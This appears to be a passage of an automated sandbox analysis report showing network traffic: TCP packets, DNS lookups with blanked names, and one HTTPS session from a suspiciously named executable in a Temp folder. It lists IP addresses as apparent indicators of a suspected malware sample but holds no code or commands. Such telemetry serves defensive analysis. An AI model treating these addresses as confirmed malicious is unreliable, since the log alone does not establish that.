Jan 15, 2025 15:53:45.540426970 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.540544033 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.540550947 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.540584087 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.540683031 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.540699959 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.540816069 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.540874958 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.540882111 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.541023016 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.541071892 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.541078091 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.541610956 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.541659117 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.541666985 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.544842005 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.544893026 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.544900894 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.585933924 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.630796909 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.630887032 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.630969048 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.630984068 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.631086111 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.640840054 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.640970945 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.641031981 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.641087055 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.641099930 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:45.641110897 CET | 49740 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:45.641115904 CET | 443 | 49740 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:46.298283100 CET | 49741 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:46.298317909 CET | 443 | 49741 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:46.298440933 CET | 49741 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:46.298762083 CET | 49741 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:46.298779011 CET | 443 | 49741 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:46.808600903 CET | 443 | 49741 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:46.808753014 CET | 49741 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:46.810024977 CET | 49741 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:46.810034990 CET | 443 | 49741 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:46.811058044 CET | 443 | 49741 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:46.812283993 CET | 49741 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:46.812465906 CET | 49741 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:46.812491894 CET | 443 | 49741 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:46.812556028 CET | 49741 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:46.812565088 CET | 443 | 49741 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:47.480628967 CET | 443 | 49741 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:47.480885983 CET | 443 | 49741 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:47.480997086 CET | 49741 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:47.494784117 CET | 49741 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:47.494806051 CET | 443 | 49741 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:47.753742933 CET | 49742 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:47.753809929 CET | 443 | 49742 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:47.753890991 CET | 49742 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:47.754223108 CET | 49742 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:47.754249096 CET | 443 | 49742 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:48.265520096 CET | 443 | 49742 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:48.265619993 CET | 49742 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:48.266820908 CET | 49742 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:48.266835928 CET | 443 | 49742 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:48.267050028 CET | 443 | 49742 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:48.268203020 CET | 49742 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:48.268323898 CET | 49742 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:48.268357038 CET | 443 | 49742 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:48.759172916 CET | 443 | 49742 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:48.759247065 CET | 443 | 49742 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:48.759303093 CET | 49742 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:48.759510040 CET | 49742 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:48.759533882 CET | 443 | 49742 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:49.407856941 CET | 49743 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:49.407897949 CET | 443 | 49743 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:49.408014059 CET | 49743 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:49.409130096 CET | 49743 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:49.409143925 CET | 443 | 49743 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:49.926083088 CET | 443 | 49743 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:49.926321030 CET | 49743 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:49.944042921 CET | 49743 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:49.944068909 CET | 443 | 49743 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:49.944895029 CET | 443 | 49743 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:49.946964979 CET | 49743 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:49.947021008 CET | 49743 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:49.947124004 CET | 443 | 49743 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:49.947199106 CET | 49743 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:49.947211027 CET | 443 | 49743 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:50.651838064 CET | 443 | 49743 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:50.652085066 CET | 443 | 49743 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:50.652142048 CET | 49743 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:50.652293921 CET | 49743 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:50.652312994 CET | 443 | 49743 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:51.437555075 CET | 49744 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:51.437593937 CET | 443 | 49744 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:51.437820911 CET | 49744 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:51.438021898 CET | 49744 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:51.438031912 CET | 443 | 49744 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:51.924448967 CET | 443 | 49744 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:51.924722910 CET | 49744 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:51.926884890 CET | 49744 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:51.926892996 CET | 443 | 49744 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:51.927231073 CET | 443 | 49744 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:51.928462029 CET | 49744 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:51.928462029 CET | 49744 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:51.928504944 CET | 443 | 49744 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:52.409903049 CET | 443 | 49744 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:52.410152912 CET | 443 | 49744 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:52.410228968 CET | 49744 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:52.410418034 CET | 49744 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:52.410438061 CET | 443 | 49744 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:52.492697001 CET | 49745 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:52.492747068 CET | 443 | 49745 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:52.492811918 CET | 49745 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:52.499008894 CET | 49745 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:52.499025106 CET | 443 | 49745 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:53.027611017 CET | 443 | 49745 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:53.027692080 CET | 49745 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:53.028865099 CET | 49745 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:53.028875113 CET | 443 | 49745 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:53.029902935 CET | 443 | 49745 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:53.031162977 CET | 49745 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:53.031229973 CET | 49745 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:53.031238079 CET | 443 | 49745 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:53.415055990 CET | 443 | 49745 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:53.415293932 CET | 443 | 49745 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:53.415549994 CET | 49745 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:53.415596962 CET | 49745 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:53.415616035 CET | 443 | 49745 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:53.769362926 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:53.769418955 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:53.769558907 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:53.769821882 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:53.769843102 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.272604942 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.272684097 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.274105072 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.274112940 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.274599075 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.276567936 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.277249098 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.277287006 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.277391911 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.277431011 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.279850960 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.279898882 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.280237913 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.280268908 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.280381918 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.280420065 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.280586004 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.280615091 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.280627012 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.280647993 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.280728102 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.280754089 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.280771971 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.280869961 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.280894995 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.290859938 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.292011023 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.292037010 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:54.292056084 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.292083979 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.293849945 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:54.295721054 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:56.030503988 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:56.030755043 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:56.030814886 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:56.030919075 CET | 49746 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:56.030931950 CET | 443 | 49746 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:56.033935070 CET | 49747 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:56.033971071 CET | 443 | 49747 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:56.034063101 CET | 49747 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:56.034337044 CET | 49747 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:56.034353018 CET | 443 | 49747 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:56.533601046 CET | 443 | 49747 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:56.533823013 CET | 49747 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:56.535413027 CET | 49747 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:56.535420895 CET | 443 | 49747 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:56.535828114 CET | 443 | 49747 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:56.537583113 CET | 49747 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:56.537611961 CET | 49747 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:56.537671089 CET | 443 | 49747 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:56.909523964 CET | 443 | 49747 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:56.909750938 CET | 443 | 49747 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:56.909832001 CET | 49747 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:56.910069942 CET | 49747 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:56.910084963 CET | 443 | 49747 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:56.910109997 CET | 49747 | 443 | 192.168.2.4 | 172.67.192.161 |
Jan 15, 2025 15:53:56.910115004 CET | 443 | 49747 | 172.67.192.161 | 192.168.2.4 |
Jan 15, 2025 15:53:57.022005081 CET | 49748 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 15, 2025 15:53:57.022042990 CET | 443 | 49748 | 185.161.251.21 | 192.168.2.4 |
Jan 15, 2025 15:53:57.022155046 CET | 49748 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 15, 2025 15:53:57.022572041 CET | 49748 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 15, 2025 15:53:57.022588015 CET | 443 | 49748 | 185.161.251.21 | 192.168.2.4 |
Jan 15, 2025 15:53:57.680979967 CET | 443 | 49748 | 185.161.251.21 | 192.168.2.4 |
Jan 15, 2025 15:53:57.681103945 CET | 49748 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 15, 2025 15:53:57.682776928 CET | 49748 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 15, 2025 15:53:57.682790041 CET | 443 | 49748 | 185.161.251.21 | 192.168.2.4 |
Jan 15, 2025 15:53:57.683296919 CET | 443 | 49748 | 185.161.251.21 | 192.168.2.4 |
Jan 15, 2025 15:53:57.684643030 CET | 49748 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 15, 2025 15:53:57.731339931 CET | 443 | 49748 | 185.161.251.21 | 192.168.2.4 |
Jan 15, 2025 15:53:57.950947046 CET | 443 | 49748 | 185.161.251.21 | 192.168.2.4 |
Jan 15, 2025 15:53:57.951143026 CET | 443 | 49748 | 185.161.251.21 | 192.168.2.4 |
Jan 15, 2025 15:53:57.951328039 CET | 49748 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 15, 2025 15:53:57.951369047 CET | 49748 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 15, 2025 15:53:57.951369047 CET | 49748 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 15, 2025 15:53:57.951391935 CET | 443 | 49748 | 185.161.251.21 | 192.168.2.4 |
Jan 15, 2025 15:53:57.951406002 CET | 443 | 49748 | 185.161.251.21 | 192.168.2.4 |
Jan 15, 2025 15:53:58.103504896 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.103549004 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.103638887 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.104063034 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.104080915 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.609347105 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.609414101 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.611347914 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.611360073 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.611774921 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.613432884 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.659342051 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.783577919 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.783642054 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.783682108 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.783713102 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.783725023 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.783751965 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.783771992 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.783793926 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.783835888 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.783842087 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.784204960 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.784251928 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.784256935 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.788413048 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.788451910 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.788469076 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.788476944 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.788526058 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.788531065 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.835928917 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.871052980 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.871191978 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.871294022 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.871721983 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.871741056 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Jan 15, 2025 15:53:58.871754885 CET | 49749 | 443 | 192.168.2.4 | 104.21.15.122 |
Jan 15, 2025 15:53:58.871762037 CET | 443 | 49749 | 104.21.15.122 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 15, 2025 15:53:16.589545012 CET | 52881 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 15, 2025 15:53:16.597733021 CET | 53 | 52881 | 1.1.1.1 | 192.168.2.4 |
Jan 15, 2025 15:53:43.207823992 CET | 53922 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 15, 2025 15:53:43.220027924 CET | 53 | 53922 | 1.1.1.1 | 192.168.2.4 |
Jan 15, 2025 15:53:56.913564920 CET | 51850 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 15, 2025 15:53:57.021050930 CET | 53 | 51850 | 1.1.1.1 | 192.168.2.4 |
Jan 15, 2025 15:53:58.090708971 CET | 56955 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 15, 2025 15:53:58.102802038 CET | 53 | 56955 | 1.1.1.1 | 192.168.2.4 |
Jan 15, 2025 15:53:59.100795984 CET | 52417 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 15, 2025 15:53:59.110220909 CET | 53 | 52417 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 15, 2025 15:53:16.589545012 CET | 192.168.2.4 | 1.1.1.1 | 0x61d9 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 15, 2025 15:53:43.207823992 CET | 192.168.2.4 | 1.1.1.1 | 0x490a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 15, 2025 15:53:56.913564920 CET | 192.168.2.4 | 1.1.1.1 | 0x3a58 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 15, 2025 15:53:58.090708971 CET | 192.168.2.4 | 1.1.1.1 | 0x36da | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 15, 2025 15:53:59.100795984 CET | 192.168.2.4 | 1.1.1.1 | 0x9b47 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 15, 2025 15:53:16.597733021 CET | 1.1.1.1 | 192.168.2.4 | 0x61d9 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 15, 2025 15:53:43.220027924 CET | 1.1.1.1 | 192.168.2.4 | 0x490a | No error (0) | 172.67.192.161 | A (IP address) | IN (0x0001) | false | ||
Jan 15, 2025 15:53:43.220027924 CET | 1.1.1.1 | 192.168.2.4 | 0x490a | No error (0) | 104.21.11.206 | A (IP address) | IN (0x0001) | false | ||
Jan 15, 2025 15:53:57.021050930 CET | 1.1.1.1 | 192.168.2.4 | 0x3a58 | No error (0) | 185.161.251.21 | A (IP address) | IN (0x0001) | false | ||
Jan 15, 2025 15:53:58.102802038 CET | 1.1.1.1 | 192.168.2.4 | 0x36da | No error (0) | 104.21.15.122 | A (IP address) | IN (0x0001) | false | ||
Jan 15, 2025 15:53:58.102802038 CET | 1.1.1.1 | 192.168.2.4 | 0x36da | No error (0) | 172.67.162.153 | A (IP address) | IN (0x0001) | false | ||
Jan 15, 2025 15:53:59.110220909 CET | 1.1.1.1 | 192.168.2.4 | 0x9b47 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49739 | 172.67.192.161 | 443 | 7760 | C:\Users\user\AppData\Local\Temp\686105\Challenged.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-15 14:53:43 UTC | 264 | OUT | |
2025-01-15 14:53:43 UTC | 8 | OUT | |
2025-01-15 14:53:44 UTC | 1138 | IN | |
2025-01-15 14:53:44 UTC | 7 | IN | |
2025-01-15 14:53:44 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
